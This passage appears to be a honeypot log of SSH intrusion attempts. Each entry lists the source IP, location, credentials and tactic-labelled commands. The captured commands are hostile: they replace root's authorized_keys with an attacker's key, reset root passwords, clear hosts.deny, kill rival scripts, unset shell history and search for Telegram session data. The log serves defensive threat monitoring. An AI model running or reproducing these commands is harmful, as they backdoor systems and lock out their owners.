โ†ณ CPU profiling
$ echo "root:frta33eyDocJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ listless_seoul_root (122.35.192.61) โ€” Yongin-si, South Korea ยท 1 session ยท 19 cmds
2026-05-13 23:46 EDT ยท as root/pass123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:EfNONgqgUjcv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ baroque_orchid_root (43.156.72.225) โ€” Singapore, Singapore ยท 1 session ยท 20 cmds
2026-05-13 19:33 EDT ยท as ubuntu/1q2w3e4r
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1q2w3e4r\nxAyQevDkHa0i\nxAyQevDkHa0i"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e4r\nxAyQevDkHa0i\nxAyQevDkHa0i\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ aloof_baguette_root (51.254.146.130) โ€” Paris, France ยท 1 session ยท 9 cmds
2026-05-13 17:50 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ zealous_windmill_root (34.13.216.121) โ€” Groningen, Netherlands ยท 1 session ยท 1 cmd
2026-05-13 15:27 EDT ยท as oracle/oracle123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ manic_merlion_db (43.160.243.51) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-13 15:12 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ sneaky_clog_sol (2.57.122.208) โ€” Amsterdam, The Netherlands ยท 96 sessions ยท 96 cmds
2026-05-06 18:28 EDT ยท as sol/123, sol/sol, solana/solana
Ran uname 1047x across 1047 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—96
โ†ณ obfuscated system check
๐ŸŽญ drowsy_bike_root (34.34.84.121) โ€” Groningen, Netherlands ยท 1 session ยท 1 cmd
2026-05-13 11:35 EDT ยท as oracle/oracle123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_pasta_root (5.95.121.178) โ€” Naples, Italy ยท 1 session ยท 19 cmds
2026-05-13 08:15 EDT ยท as root/1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:0Nu8mSIAwyri"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ haywire_cipher_root (95.216.57.121) โ€” Helsinki, Finland ยท 1 session ยท 1 cmd
2026-05-13 07:45 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ scrappy_wraith_root (37.27.26.133) โ€” Helsinki, Finland ยท 1 session ยท 1 cmd
2026-05-13 06:52 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ gnarled_kebab_root (213.250.134.35) โ€” Istanbul, Turkey ยท 27 sessions ยท 27 cmds
2026-05-13 05:33 EDT ยท as admin/admin, admin/admin123, admin/password
Ran uname 27x across 27 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ brisk_silk_root_31 (121.41.116.31) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-13 06:15 EDT ยท as test/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rusty_blitz_root_233 (165.22.71.233) โ€” Frankfurt am Main, Germany ยท 1 session ยท 1 cmd
2026-05-13 05:42 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ weary_ximen_root (106.107.248.155) โ€” Taichung, Taiwan ยท 1 session ยท 1 cmd
2026-05-13 04:54 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ velvet_merlion_root (43.106.142.143) โ€” Singapore, Singapore ยท 35 sessions ยท 35 cmds
2026-05-12 22:56 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—35
๐ŸŽญ vapor_elephant_root (155.102.201.82) โ€” Bangkok, Thailand ยท 1 session ยท 1 cmd
2026-05-12 22:28 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ silent_jade_root_86 (121.196.227.86) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-12 22:09 EDT ยท as admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ velvet_dragon_root_64 (116.177.172.64) โ€” Jinrongjie, China ยท 1 session ยท 1 cmd
2026-05-12 21:21 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_blitz_crypto (212.87.212.169) โ€” Frankfurt am Main, Germany ยท 1 session ยท 5 cmds
2026-05-12 20:46 EDT ยท as bitcoin/bitcoin
unset โ†’ ls โ†’ exit
$ unset HISTFILE
$ ls
$ ls -lah
$ ls /home/
$ exit
๐ŸŽญ brazen_capoeira_root (186.248.197.77) โ€” Belo Horizonte, Brazil ยท 1 session ยท 2 cmds
2026-05-12 18:43 EDT ยท as oracle/oracle@2025
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_jade_db (43.138.184.154) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-12 18:24 EDT ยท as oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ derelict_silk_root (8.136.127.153) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-12 17:25 EDT ยท as guest/guest
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rusty_neon_root (47.243.137.13) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-12 17:10 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ jittery_gouda_root_111 (192.42.116.111) โ€” Amsterdam, The Netherlands ยท 1 session ยท 3 cmds
2026-05-12 15:56 EDT ยท as admin/admin
CPU profiling โ†’ CPU profiling โ†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778615765969107763" | sh
โ†ณ CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778615765969107763
โ†ณ CPU profiling
$
๐ŸŽญ stoic_dragon_root_21 (114.218.57.21) โ€” Nanjing, China ยท 1 session ยท 1 cmd
2026-05-12 13:53 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ feral_rioja_sol (46.37.82.131) โ€” Mรกlaga, Spain ยท 1 session ยท 19 cmds
2026-05-12 11:43 EDT ยท as root/qwerty
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:hqoUuyrp5AEz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_pho_root (171.244.37.103) โ€” Hanoi, Vietnam ยท 1 session ยท 2 cmds
2026-05-12 06:18 EDT ยท as oracle/111111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ crimson_frost_root (156.227.232.198) โ€” Moscow, Russia ยท 1 session ยท 2 cmds
2026-05-12 05:18 EDT ยท as oracle/Oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_batik_root (202.184.134.88) โ€” Kuala Lumpur, Malaysia ยท 1 session ยท 2 cmds
2026-05-12 04:54 EDT ยท as oracle/Oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ murky_panda_root_102 (82.156.110.102) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-12 01:54 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ silent_pierogi_root (83.168.110.83) โ€” Warsaw, Poland ยท 32 sessions ยท 32 cmds
2026-05-12 00:00 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ aloof_eagle_root (170.106.198.227) โ€” Santa Clara, United States ยท 1 session ยท 1 cmd
2026-05-12 00:25 EDT ยท as test/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ scrappy_dimsum_root (103.210.21.225) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-05-11 23:06 EDT ยท as oracle/oracle2019
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_chai_root (206.189.132.238) โ€” Bengaluru, India ยท 1 session ยท 1 cmd
2026-05-11 17:41 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rogue_peak_root (47.239.41.206) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-11 15:02 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ venomous_echo_root (41.90.100.147) โ€” Nairobi, Kenya ยท 1 session ยท 2 cmds
2026-05-11 14:55 EDT ยท as oracle/11111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ venomous_hawker_root (68.178.160.148) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-11 13:27 EDT ยท as admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ listless_wok_root (39.97.249.70) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-11 11:38 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ placid_merlion_db (165.22.248.213) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-11 10:46 EDT ยท as test/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ gnarled_eagle_root_36 (96.78.175.36) โ€” Sunnyvale, United States ยท 1 session ยท 2 cmds
2026-05-11 09:29 EDT ยท as oracle/1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ restless_windmill_root (107.189.27.179) โ€” Zaandam, Netherlands ยท 2 sessions ยท 21 cmds
2026-05-11 06:41 EDT ยท as oracle/Qq123456, root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:TDPosVbY6gnv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_toucan_root_230 (177.85.247.230) โ€” Timon, Brazil ยท 1 session ยท 2 cmds
2026-05-11 06:45 EDT ยท as oracle/P@ssw0rd
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
